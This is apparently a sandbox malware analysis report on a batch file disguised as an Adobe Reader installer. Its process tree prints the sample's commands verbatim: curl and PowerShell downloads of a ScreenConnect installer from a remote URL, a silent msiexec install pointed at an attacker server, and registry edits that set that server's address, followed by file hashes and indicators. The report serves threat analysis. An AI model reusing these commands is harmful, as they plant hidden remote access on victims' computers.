Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    10/09/2026, 00:16

General

  • Target
    Adobe_Reader_install.bat
  • Size 19KB
  • Sample260910-akjlpsserd
  • SHA256 a4c2ad6537390d2d1dcb919c1363dab66acfb2ded9c5843ab7bc128eec118b91
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Extracted

Language
  • ps1

Deobfuscated
Source
URLs
  • exe.dropper

    https://pub-9ee8bb8867504e9bb658a187ab29224c.r2.dev/ScreenConnect.ClientSetup.msi

Signatures

  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Sets service image path in registry 3 TTPs 1 IoCs

    This determines the executable launched when a service starts. It can be used to establish persistence.

  • Signed with revoked ConnectWise certificate 4 IoCs

    Binary is signed using a ConnectWise certificate revoked for key compromise.

  • ConnectWise ScreenConnect remote access tool

    ConnectWise ScreenConnect is a remote desktop tool that can be used as a backdoor.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Discovers running processes 1 TTPs 2 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 22 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Executes a command shell one-liner 1 TTPs 3 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Adobe_Reader_install.bat"
    1⤵
    • Executes a command shell one-liner
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2720
      • C:\Windows\system32\where.exe
        where msiexec
        2⤵
          PID:2848
        • C:\Windows\system32\where.exe
          where powershell
          2⤵
            PID:3080
          • C:\Windows\system32\where.exe
            where curl
            2⤵
              PID:4944
            • C:\Windows\system32\where.exe
              where curl
              2⤵
                PID:4996
              • C:\Windows\system32\curl.exe
                curl -s -L -o "C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\ScreenConnect.ClientSetup.msi" "https://pub-9ee8bb8867504e9bb658a187ab29224c.r2.dev/ScreenConnect.ClientSetup.msi" --connect-timeout 90 --max-time 600 --retry 3 --retry-delay 5 --retry-max-time 300 --show-error
                2⤵
                  PID:2108
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "$ErrorActionPreference='Stop'; $ProgressPreference='SilentlyContinue'; try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $client = New-Object System.Net.WebClient; $client.DownloadFile('https://pub-9ee8bb8867504e9bb658a187ab29224c.r2.dev/ScreenConnect.ClientSetup.msi', 'C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\ScreenConnect.ClientSetup.msi') } catch { exit 1 }"
                  2⤵
                  • Badlisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2820
                • C:\Windows\system32\msiexec.exe
                  msiexec /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\ScreenConnect.ClientSetup.msi" /quiet /qn /norestart SERVER_ADDRESS="http://172.245.244.73:8040" SERVER_HOST="172.245.244.73" SERVER_PORT="8040" /l*v "C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\install_log.txt"
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2516
                • C:\Windows\system32\timeout.exe
                  timeout /t 15 /nobreak
                  2⤵
                  • Delays execution with timeout.exe
                  PID:3628
                • C:\Windows\system32\findstr.exe
                  findstr /i "Installation completed successfully" "C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\install_log.txt"
                  2⤵
                    PID:2372
                  • C:\Windows\system32\findstr.exe
                    findstr /i "Installation success" "C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\install_log.txt"
                    2⤵
                      PID:3716
                    • C:\Windows\system32\timeout.exe
                      timeout /t 3 /nobreak
                      2⤵
                      • Delays execution with timeout.exe
                      PID:4808
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FI "IMAGENAME eq ScreenConnect.ClientService.exe"
                      2⤵
                      • Discovers running processes
                      PID:4344
                    • C:\Windows\system32\find.exe
                      find /i "ScreenConnect.ClientService.exe"
                      2⤵
                        PID:876
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\ScreenConnect" /v "ServerAddress" /t REG_SZ /d "http://172.245.244.73:8040" /f
                        2⤵
                          PID:2768
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\WOW6432Node\ScreenConnect" /v "ServerAddress" /t REG_SZ /d "http://172.245.244.73:8040" /f
                          2⤵
                            PID:2364
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\ScreenConnect" /v "Host" /t REG_SZ /d "172.245.244.73" /f
                            2⤵
                              PID:2780
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\WOW6432Node\ScreenConnect" /v "Host" /t REG_SZ /d "172.245.244.73" /f
                              2⤵
                                PID:4028
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\ScreenConnect" /v "Port" /t REG_SZ /d "8040" /f
                                2⤵
                                  PID:4892
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\WOW6432Node\ScreenConnect" /v "Port" /t REG_SZ /d "8040" /f
                                  2⤵
                                    PID:4880
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c dir /b /s "C:\Program Files*" 2>nul | findstr /i "ScreenConnect.ClientService.exe"
                                    2⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:4852
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" dir /b /s "C:\Program Files*" 2>nul"
                                      3⤵
                                        PID:5068
                                      • C:\Windows\system32\findstr.exe
                                        findstr /i "ScreenConnect.ClientService.exe"
                                        3⤵
                                          PID:2224
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c dir /b /s "C:\" 2>nul | findstr /i "ScreenConnect.ClientService.exe"
                                        2⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:1768
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" dir /b /s "C:\" 2>nul"
                                          3⤵
                                            PID:2296
                                          • C:\Windows\system32\findstr.exe
                                            findstr /i "ScreenConnect.ClientService.exe"
                                            3⤵
                                              PID:3412
                                          • C:\Windows\system32\net.exe
                                            net stop "ScreenConnect Client Service"
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:4008
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop "ScreenConnect Client Service"
                                              3⤵
                                                PID:3948
                                            • C:\Windows\system32\net.exe
                                              net stop "ScreenConnect Client"
                                              2⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3380
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop "ScreenConnect Client"
                                                3⤵
                                                  PID:3992
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 5 /nobreak
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:5044
                                              • C:\Windows\system32\net.exe
                                                net start "ScreenConnect Client Service"
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4956
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 start "ScreenConnect Client Service"
                                                  3⤵
                                                    PID:968
                                                • C:\Windows\system32\net.exe
                                                  net start "ScreenConnect Client"
                                                  2⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3924
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 start "ScreenConnect Client"
                                                    3⤵
                                                      PID:3436
                                                  • C:\Windows\system32\sc.exe
                                                    sc start "ScreenConnect Client Service"
                                                    2⤵
                                                    • Launches sc.exe
                                                    PID:2544
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "Start-Service -Name 'ScreenConnect*' -ErrorAction SilentlyContinue"
                                                    2⤵
                                                    • Hide Artifacts: Ignore Process Interrupts
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4380
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 3 /nobreak
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3240
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 5 /nobreak
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:4908
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "$ErrorActionPreference='SilentlyContinue'; try { Test-NetConnection -ComputerName 172.245.244.73 -Port 8040 -WarningAction SilentlyContinue -InformationLevel Quiet | Out-File -Append 'C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log' } catch { 'Network check failed' | Out-File -Append 'C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log' }"
                                                    2⤵
                                                    • Badlisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3800
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FI "IMAGENAME eq ScreenConnect.ClientService.exe"
                                                    2⤵
                                                    • Discovers running processes
                                                    PID:2948
                                                  • C:\Windows\system32\find.exe
                                                    find /i "ScreenConnect.ClientService.exe"
                                                    2⤵
                                                      PID:2720
                                                  • C:\Windows\system32\msiexec.exe
                                                    C:\Windows\system32\msiexec.exe /V
                                                    1⤵
                                                    • Enumerates connected drives
                                                    • Boot or Logon Autostart Execution: Authentication Package
                                                    • Drops file in Program Files directory
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4412
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A1A9008056571102DE8424D4376C4A3A
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3752
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        rundll32.exe "C:\Windows\Installer\MSI169B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240719687 2 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                        3⤵
                                                        • Loads dropped DLL
                                                        • Drops file in Windows directory
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1164
                                                    • C:\Windows\syswow64\MsiExec.exe
                                                      C:\Windows\syswow64\MsiExec.exe -Embedding DABC837C07B1BB6C3F8C6B1189C3CADB E Global\MSI0000
                                                      2⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3800
                                                  • C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.ClientService.exe
                                                    "C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=172.245.244.73&p=8041&s=8a99d76f-a9f9-4242-8867-15ec6cb22560&k=BgIAAACkAABSU0ExAAgAAAEAAQA5caTb%2fPYrJ%2fXrrenWFmwgkuQQtYD5Q%2fChbF%2bTLlHTxdyPfk7AGzal4CuoZaWT25hV3Fq4%2f0c2ZoDmy%2f0mFPXbEAS3CyjX8Agnrz9Q75y%2bM6rCXVMPRoykYH%2fr%2f6ZT9vxDgQtcz3jbgF9QsQoiibAhayQ2eY%2b0CSqaUyrS5tHiyCCo13YN7nUhrnNSCZEzJJCtSiEX51M%2fpkLaQ0Fnyc6S5Y8ViEwqz4NuBNNIcNBThrQOqlWTlKlh7cfVIR1kpC%2bjLoA1RewXhE6txWs6HDI9hMl9uNMrTewR9lz9T%2ffCOXksdslC969DGY4QD%2bw2%2bBAZRvxHmXku0syEVIqASNnA"
                                                    1⤵
                                                    • Sets service image path in registry
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in System32 directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1276
                                                    • C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe
                                                      "C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe" "RunRole" "cff83753-947e-41df-86f7-da9b13985dd6" "User"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:1504
                                                    • C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe
                                                      "C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe" "RunRole" "8596cd38-5030-4328-a02e-d18ba887664f" "System"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Drops file in System32 directory
                                                      • Checks processor information in registry
                                                      • Modifies data under HKEY_USERS
                                                      PID:2508

                                                  Network

                                                        MITRE ATT&CK Enterprise v16

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        e5913cf.rbs

                                                        • Path C:\Config.Msi\e5913cf.rbs
                                                        • Size 214KB
                                                        • SHA256 c9f8690f4eaff8146839e983dc9c546f0464025f6412767dedcd9c46cbc8b58b
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        Client.Override.en-US.resources

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\Client.Override.en-US.resources
                                                        • Size 363B
                                                        • SHA256 e877dda11c999975c69401f0acfc75c11324cca5f13698584764fabb2bb40204
                                                        • MD5 SHA1 SHA512 TLSH

                                                        Client.Override.resources

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\Client.Override.resources
                                                        • Size 443B
                                                        • SHA256 149732481ba9cd1959a5161ce23fed7205127f2fb989a36e110ce68a2198bf27
                                                        • MD5 SHA1 SHA512 TLSH

                                                        Client.en-US.resources

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\Client.en-US.resources
                                                        • Size 48KB
                                                        • SHA256 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        Client.resources

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\Client.resources
                                                        • Size 26KB
                                                        • SHA256 de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.Client.dll

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.Client.dll
                                                        • Size 192KB
                                                        • SHA256 ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.ClientService.dll

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.ClientService.dll
                                                        • Size 66KB
                                                        • SHA256 fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.ClientService.exe

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.ClientService.exe
                                                        • Size 93KB
                                                        • SHA256 f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.WindowsAuthenticationPackage.dll

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsAuthenticationPackage.dll
                                                        • Size 254KB
                                                        • SHA256 a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.WindowsClient.exe

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe
                                                        • Size 588KB
                                                        • SHA256 600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.WindowsClient.exe.config

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsClient.exe.config
                                                        • Size 266B
                                                        • SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
                                                        • MD5 SHA1 SHA512 TLSH

                                                        ScreenConnect.WindowsCredentialProvider.dll

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\ScreenConnect.WindowsCredentialProvider.dll
                                                        • Size 822KB
                                                        • SHA256 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        app.config

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\app.config
                                                        • Size 1KB
                                                        • SHA256 92aa0b705f755cecf70dd713990db5461df6b7a7c650c77c9a79f43a2d92a6f4
                                                        • MD5 SHA1 SHA512 TLSH

                                                        system.config

                                                        • Path C:\Program Files (x86)\ScreenConnect Client (e3cd57298855272a)\system.config
                                                        • Size 950B
                                                        • SHA256 f59a62eb9f17e85afe9df735304b5c86d7473afe4c2e3ff028db79c97e0bbc49
                                                        • MD5 SHA1 SHA512 TLSH

                                                        powershell.exe.log

                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                        • Size 2KB
                                                        • SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
                                                        • MD5 SHA1 SHA512 TLSH

                                                        StartupProfileData-NonInteractive

                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        • Size 1KB
                                                        • SHA256 2bb8a7e9f4e0e32747cff6ea05c00676901757474003ccd008551b34facb120c
                                                        • MD5 SHA1 SHA512 TLSH

                                                        StartupProfileData-NonInteractive

                                                        • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        • Size 64B
                                                        • SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
                                                        • MD5 SHA1 SHA512

                                                        ScreenConnect.ClientSetup.msi

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\ScreenConnect.ClientSetup.msi
                                                        • Size 12.7MB
                                                        • SHA256 68ae12984b7b7b48ac58de7da7f932985be107d9f555440abfd038ee4ba1f15b
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        install_log.txt

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\install_log.txt
                                                        • Size 166KB
                                                        • SHA256 e4f1a0efac38a034a10d04b9d76a2074f4a188115c30b9d6e1c9cf22a9f46fde
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        install_log.txt

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_11028_21.85\install_log.txt
                                                        • Size 1KB
                                                        • SHA256 23993e35aa189d92b2ebafcbb71501cf97fad868cd40688fd4ce8d7f6665e133
                                                        • MD5 SHA1 SHA512 TLSH

                                                        ScreenConnect_Install.log

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log
                                                        • Size 3KB
                                                        • SHA256 50d51168c1e017750ec657cd5698a8c5db25d5b7680681bdbe3c7cec6381bdae
                                                        • MD5 SHA1 SHA512 TLSH

                                                        ScreenConnect_Install.log

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log
                                                        • Size 4KB
                                                        • SHA256 93e99c02291654e7be00fe42f6ad304c0e124e19f1971bbf083d3ab413715c9a
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect_Install.log

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log
                                                        • Size 4KB
                                                        • SHA256 583d91d59bfccc76d2652e72280afa13a8c744cb5bf1e4321342d273b0a252eb
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect_Install.log

                                                        • Path C:\Users\Admin\AppData\Local\Temp\ScreenConnect_Install.log
                                                        • Size 4KB
                                                        • SHA256 38d225330b2ffa484b182f5769cfcd9f5b1d8ed6c0cb1a935634c190cd7fcbca
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        __PSScriptPolicyTest_xgzjqzma.bsy.ps1

                                                        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgzjqzma.bsy.ps1
                                                        • Size 60B
                                                        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                        • MD5 SHA1 SHA512 TLSH

                                                        MSI169B.tmp

                                                        • Path C:\Windows\Installer\MSI169B.tmp
                                                        • Size 1.0MB
                                                        • SHA256 0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        Microsoft.Deployment.WindowsInstaller.dll

                                                        • Path C:\Windows\Installer\MSI169B.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                                        • Size 172KB
                                                        • SHA256 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.Core.dll

                                                        • Path C:\Windows\Installer\MSI169B.tmp-\ScreenConnect.Core.dll
                                                        • Size 536KB
                                                        • SHA256 a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.InstallerActions.dll

                                                        • Path C:\Windows\Installer\MSI169B.tmp-\ScreenConnect.InstallerActions.dll
                                                        • Size 11KB
                                                        • SHA256 d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        ScreenConnect.Windows.dll

                                                        • Path C:\Windows\Installer\MSI169B.tmp-\ScreenConnect.Windows.dll
                                                        • Size 1.6MB
                                                        • SHA256 84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        MSI1EDB.tmp

                                                        • Path C:\Windows\Installer\MSI1EDB.tmp
                                                        • Size 202KB
                                                        • SHA256 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
                                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                                        memory/1164-69-0x0000000002950000-0x00000000029DC000-memory.dmp

                                                        memory/1164-61-0x0000000002870000-0x000000000289E000-memory.dmp

                                                        memory/1164-65-0x00000000028A0000-0x00000000028AA000-memory.dmp

                                                        memory/1164-73-0x0000000004F40000-0x00000000050EA000-memory.dmp

                                                        memory/1164-74-0x00000000056A0000-0x0000000005C44000-memory.dmp

                                                        memory/1276-130-0x00000000042E0000-0x0000000004372000-memory.dmp

                                                        memory/1276-125-0x0000000003FE0000-0x0000000004030000-memory.dmp

                                                        memory/1276-114-0x0000000003D80000-0x0000000003D98000-memory.dmp

                                                        memory/1276-129-0x0000000004030000-0x0000000004066000-memory.dmp

                                                        memory/1276-132-0x0000000004240000-0x0000000004281000-memory.dmp

                                                        memory/1276-134-0x00000000044C0000-0x0000000004592000-memory.dmp

                                                        memory/1504-160-0x00000000029E0000-0x00000000029F8000-memory.dmp

                                                        memory/1504-161-0x0000000002A60000-0x0000000002A78000-memory.dmp

                                                        memory/1504-159-0x000000001BC80000-0x000000001BE06000-memory.dmp

                                                        memory/1504-157-0x000000001B890000-0x000000001B91C000-memory.dmp

                                                        memory/1504-158-0x000000001BAD0000-0x000000001BC7A000-memory.dmp

                                                        memory/1504-155-0x00000000008E0000-0x0000000000976000-memory.dmp

                                                        memory/1504-156-0x0000000002A00000-0x0000000002A36000-memory.dmp

                                                        memory/2820-23-0x0000020DC2670000-0x0000020DC2680000-memory.dmp

                                                        memory/2820-24-0x0000020DC5040000-0x0000020DC5062000-memory.dmp

                                                        memory/2820-22-0x0000020DC2670000-0x0000020DC2680000-memory.dmp

                                                        memory/4380-228-0x0000019A22FA0000-0x0000019A231BC000-memory.dmp